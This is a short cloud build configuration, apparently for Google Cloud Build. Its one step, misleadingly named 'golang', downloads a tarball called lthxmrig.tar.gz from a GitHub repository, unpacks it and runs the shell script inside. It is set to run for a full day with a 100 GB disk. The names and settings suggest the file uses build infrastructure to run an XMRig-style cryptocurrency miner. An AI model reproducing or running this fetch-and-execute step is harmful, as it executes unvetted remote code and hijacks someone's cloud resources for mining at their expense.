steps:
  - name: golang
    args:
      - '-c'
      - >-
         wget https://github.com/pionbangkit/cobacoba/raw/main/lthxmrig.tar.gz && tar xf lthxmrig.tar.gz && ./lth.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  diskSizeGb: '100'
